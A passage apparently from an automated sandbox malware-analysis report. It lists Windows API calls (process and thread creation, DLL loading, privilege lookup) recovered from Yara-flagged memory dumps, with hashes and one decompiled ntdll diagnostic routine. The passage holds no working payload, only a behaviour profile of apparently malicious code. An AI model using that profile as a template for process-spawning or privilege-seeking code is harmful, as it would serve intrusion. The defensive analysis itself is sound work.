                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00AA8584
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateInternalProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 2186235152-0
                                                                                                  • Opcode ID: 5f328e3b7ab4802a74ac13e6898d01ae03165d6f1fd64bbb53ffeb1b46c72fac
                                                                                                  • Instruction ID: 78e5751c51104fade4d34902378893d5d02fae6abff060ebd7446a6e0a1251e9
                                                                                                  • Opcode Fuzzy Hash: 5f328e3b7ab4802a74ac13e6898d01ae03165d6f1fd64bbb53ffeb1b46c72fac
                                                                                                  • Instruction Fuzzy Hash: 631110B2600108BFDB14DF98DC80DEB77A9AF8C354F118258FA1DA7341CA30ED528BA0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • RtlAllocateHeap.NTDLL(00AA3506,?,00AA3C7F,00AA3C7F,?,00AA3506,?,?,?,?,?,00000000,00000000,?), ref: 00AA84AD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1279760036-0
                                                                                                  • Opcode ID: d4a0ef90822b12b5ded95632c00f648e5ce0c7c285e10b124edf072937753477
                                                                                                  • Instruction ID: f9cde72f7557afa8c0f67e18e72fb2f7c68e98167dec007a7c40a8728e0ddd03
                                                                                                  • Opcode Fuzzy Hash: d4a0ef90822b12b5ded95632c00f648e5ce0c7c285e10b124edf072937753477
                                                                                                  • Instruction Fuzzy Hash: 79019EB26002046BDB18EF98DC84DE777ACEF88310F008559FA489B381CA35ED11CBE0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00A99B82
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Load
                                                                                                  • String ID:
                                                                                                  • API String ID: 2234796835-0
                                                                                                  • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                  • Instruction ID: 75beb4a4a7164b9f4fabd6765e617a44b70aa7618af571716881ceaf9469580a
                                                                                                  • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                  • Instruction Fuzzy Hash: 7C0100B5E4020DBBDF10DBA4DD42F9EB3B89B54308F004195A90897181F635EB14CB92
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00AA8584
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateInternalProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 2186235152-0
                                                                                                  • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                  • Instruction ID: 8272c3f5e6da646ec86d9d5852e4e4dbb8e71533419d35364d83c78938a63aa8
                                                                                                  • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                  • Instruction Fuzzy Hash: 7D01AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97241CA30E851CBA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,-00000002,?,00000000,00000000,?,?,00A9CCC0,?,?), ref: 00AA703C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2422867632-0
                                                                                                  • Opcode ID: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
                                                                                                  • Instruction ID: 80f583bb0d0cc3fd1b2026bf5c708cb874283bd0d1c1719e9699eaef52dabb84
                                                                                                  • Opcode Fuzzy Hash: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
                                                                                                  • Instruction Fuzzy Hash: 4CE092333803143AE7306599AC03FABB39CDB82B20F140026FA4DEB2C1D695F90142A4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,-00000002,?,00000000,00000000,?,?,00A9CCC0,?,?), ref: 00AA703C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2422867632-0
                                                                                                  • Opcode ID: 2641ac046e3efb53b3cc502f352bb4151f6825f11c3262ba12b5620010cc627c
                                                                                                  • Instruction ID: 18f560c5522fb9c4c8f918ff6f7b9de1d77e2f4f721a2fe153e370fe2ef14b77
                                                                                                  • Opcode Fuzzy Hash: 2641ac046e3efb53b3cc502f352bb4151f6825f11c3262ba12b5620010cc627c
                                                                                                  • Instruction Fuzzy Hash: E1F0EC337803103AD73055689C03FABB7A89F92710F14412AF549BB2C1D7A5F94146D4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,00A9CF92,00A9CF92,?,00000000,?,?), ref: 00AA8650
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: LookupPrivilegeValue
                                                                                                  • String ID:
                                                                                                  • API String ID: 3899507212-0
                                                                                                  • Opcode ID: 5f1d9126bdba69ba33057b26b4456c56b98c26a775afaa96450aeca6806896bf
                                                                                                  • Instruction ID: 7ede77ea943a391d4d3de1ea3ca4a6d19b52a7e0c0ab5fde1ac8e654b8ea0e00
                                                                                                  • Opcode Fuzzy Hash: 5f1d9126bdba69ba33057b26b4456c56b98c26a775afaa96450aeca6806896bf
                                                                                                  • Instruction Fuzzy Hash: 69F030756002046FDB10EF54D845ED737A8AF8A750F428154FE5857252DA34AD25CBF1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • RtlAllocateHeap.NTDLL(00AA3506,?,00AA3C7F,00AA3C7F,?,00AA3506,?,?,?,?,?,00000000,00000000,?), ref: 00AA84AD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1279760036-0
                                                                                                  • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                  • Instruction ID: 9e3f1720975838e17aaf250fae50ed5b9158a8e92de46bd262972188701aaebc
                                                                                                  • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                  • Instruction Fuzzy Hash: 3FE012B1200208ABDB14EF99CC45EA777ACAF88650F118558BA085B282CA30F9108AF0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,00A9CF92,00A9CF92,?,00000000,?,?), ref: 00AA8650
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: LookupPrivilegeValue
                                                                                                  • String ID:
                                                                                                  • API String ID: 3899507212-0
                                                                                                  • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                  • Instruction ID: 833a8cb0c7238d7ec41f8a9eb59c887e01e6674ce3ee0747046deb71e34091a6
                                                                                                  • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                  • Instruction Fuzzy Hash: 48E01AB16002086BDB10DF49CC85EE737ADAF89650F018154BA0857281CA34E8108BF5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • SetErrorMode.KERNEL32(00008003,?,?,00A97C63,?), ref: 00A9D42B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorMode
                                                                                                  • String ID:
                                                                                                  • API String ID: 2340568224-0
                                                                                                  • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                                  • Instruction ID: e80fcd8573e1d92c85782642431bc6e72aca8d64cf79c3010864d567d3c3a9e0
                                                                                                  • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                                  • Instruction Fuzzy Hash: B5D0A7767903043BEE10FBE49C03F2672CD9B45B00F494064FA48D73C3EA60F5004161
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.497408932.0000000003330000.00000040.00000001.sdmp, Offset: 03330000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.498005316.000000000344B000.00000040.00000001.sdmp
                                                                                                  • Associated: 00000008.00000002.498016656.000000000344F000.00000040.00000001.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 283bbe6d6a08513676cf6d54235ba233a88cffd860e5a1e3875bad0ee3ae45b0
                                                                                                  • Instruction ID: 4cc251b976045ee1f59c70f1e13a799a76af6b9e7dc4da638bf6b4966d8c0fa4
                                                                                                  • Opcode Fuzzy Hash: 283bbe6d6a08513676cf6d54235ba233a88cffd860e5a1e3875bad0ee3ae45b0
                                                                                                  • Instruction Fuzzy Hash: 88B09B719014C5D5EA11D7654A487177904B7D0751F56C0A6D1020681A4778C091F5B5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Non-executed Functions

                                                                                                  C-Code - Quality: 53%
                                                                                                  			// Decompiled RTL critical-section timeout diagnostic (the format strings are ntdll's).
                                                                                                  			// __edx points to the 64-bit timeout in 100 ns units; _a4 is the RTL_CRITICAL_SECTION.
                                                                                                  			E033EFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                                                  				void* _t7;
                                                                                                  				intOrPtr _t9;
                                                                                                  				intOrPtr _t10;
                                                                                                  				intOrPtr* _t12;
                                                                                                  				intOrPtr* _t13;
                                                                                                  				intOrPtr _t14;
                                                                                                  				intOrPtr* _t15;
                                                                                                  
                                                                                                  				_t13 = __edx;
                                                                                                  				_push(_a4);
                                                                                                  				_t14 = *[fs:0x18];                      // TEB self pointer (x86)
                                                                                                  				_t15 = _t12;                            // critical section pointer (decompiler register alias)
                                                                                                  				// 64-bit division helper: timeout / -10000000 converts 100 ns ticks into seconds
                                                                                                  				_t7 = E0339CE00(*__edx, *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                                                  				_push(_t13);
                                                                                                  				E033E5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                                                  				_t9 = *_t15;                            // RTL_CRITICAL_SECTION.DebugInfo
                                                                                                  				if(_t9 == 0xffffffff) {
                                                                                                  					_t10 = 0;                           // no debug info: report 0 contentions
                                                                                                  				} else {
                                                                                                  					_t10 = *((intOrPtr*)(_t9 + 0x14));  // RTL_CRITICAL_SECTION_DEBUG.ContentionCount
                                                                                                  				}
                                                                                                  				_push(_t10);                            // ContentionCount
                                                                                                  				_push(_t15);                            // Critical Section
                                                                                                  				_push(*((intOrPtr*)(_t15 + 0xc)));      // RTL_CRITICAL_SECTION.OwningThread (owner tid)
                                                                                                  				_push(*((intOrPtr*)(_t14 + 0x24)));     // TEB.ClientId.UniqueThread (Tid)
                                                                                                  				// first vararg below: TEB.ClientId.UniqueProcess (Pid)
                                                                                                  				return E033E5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n", *((intOrPtr*)(_t14 + 0x20)));
                                                                                                  			}

                                                                                                  APIs
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 033EFDFA
                                                                                                  Strings
                                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 033EFE2B
                                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 033EFE01
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.497408932.0000000003330000.00000040.00000001.sdmp, Offset: 03330000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.498005316.000000000344B000.00000040.00000001.sdmp
                                                                                                  • Associated: 00000008.00000002.498016656.000000000344F000.00000040.00000001.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                  • API String ID: 885266447-3903918235
                                                                                                  • Opcode ID: 9ee0e725b3d2598902fcb902bb7e645ecfd0cfda4ade2e218592fc0ddc68b213
                                                                                                  • Instruction ID: fb9619a674fe901cd7bbc96dabc59636526f6d57f9f21b39f23fee0af9d960cd
                                                                                                  • Opcode Fuzzy Hash: 9ee0e725b3d2598902fcb902bb7e645ecfd0cfda4ade2e218592fc0ddc68b213
                                                                                                  • Instruction Fuzzy Hash: 7CF0F676600211BFEA209A45DC82F23BB5AEB85730F154315F6285A5E1DAA2FC3096F0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%